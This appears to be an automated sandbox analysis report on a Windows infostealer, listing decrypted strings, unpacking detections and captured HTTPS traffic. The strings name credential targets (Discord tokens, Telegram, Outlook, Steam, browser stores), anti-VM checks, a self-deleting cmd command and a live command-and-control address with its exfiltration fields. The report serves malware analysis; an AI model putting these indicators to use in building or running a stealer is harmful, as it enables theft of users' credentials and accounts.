Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: system_info.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: nss3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Temp\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: .exe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: runas
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: open
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /c start
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %RECENT%
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: *.lnk
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: files
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \discord\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: key_datas
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: map*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Telegram
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Tox
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: *.tox
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: *.ini
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Password
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 00000001
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 00000002
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 00000003
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: 00000004
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Pidgin
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \.purple\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: accounts.xml
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: token:
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SteamPath
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \config\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ssfn*
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: config.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Steam\
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: browsers
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: done
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: soft
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: https
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: POST
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: hwid
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: build
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: token
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: file_name
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: file
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: message
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: screenshot.jpg
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcAddress
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LoadLibraryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcatA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateEventA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Sleep
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLangID
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAllocExNuma
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemInfo
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetComputerNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpyA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetProcessHeap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrlenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ExitProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SystemTimeToFileTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: advapi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdi32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: user32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: crypt32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ntdll.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateDCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDeviceCaps
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReleaseDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptStringToBinaryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sscanf
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VMwareVMware
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HAL9TH
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: JohnDoe
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DISPLAY
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: %hu/%hu/%hu
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: http://85.28.47.31
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: silence
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /5499d72b3a3e55be.php
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: /8405906461a5200c/
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: sila
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileAttributesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalLock
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HeapFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: IsWow64Process
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32Next
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocalTime
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FreeLibrary
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetTimeZoneInformation
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetSystemPowerStatus
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetVolumeInformationA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: Process32First
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLocaleInfoA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetModuleFileNameA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindNextFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindClose
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: LocalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetFileSizeEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SetFilePointer
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WriteFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: FindFirstFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CopyFileA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: VirtualProtect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetLastError
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: lstrcpynA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: MultiByteToWideChar
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: WideCharToMultiByte
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GlobalAlloc
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: OpenProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: TerminateProcess
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetCurrentProcessId
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: gdiplus.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ole32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: bcrypt.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wininet.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shlwapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: shell32.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: psapi.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: rstrtmgr.dll
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SelectObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BitBlt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: DeleteObject
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateCompatibleDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipGetImageEncoders
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusStartup
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdiplusShutdown
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipSaveImageToStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipDisposeImage
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GdipFree
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetHGlobalFromStream
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoUninitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoInitialize
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CoCreateInstance
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDecrypt
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptSetProperty
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptDestroyKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetWindowRect
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDesktopWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetDC
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CloseWindow
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CharToOemW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: wsprintfW
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegQueryValueExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegOpenKeyExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegCloseKey
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: RegEnumValueA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptBinaryToStringA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: CryptUnprotectData
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: SHGetFolderPathA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: ShellExecuteExA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetConnectA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCloseHandle
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetOpenA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpSendRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: HttpOpenRequestA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetReadFile
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: InternetCrackUrlA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrStrA
Source: 44.2.48f0ec6733.exe.400000.0.unpack String decryptor: StrCmpCW
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_00418940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040C660
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00407280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00409B10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C596C80

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
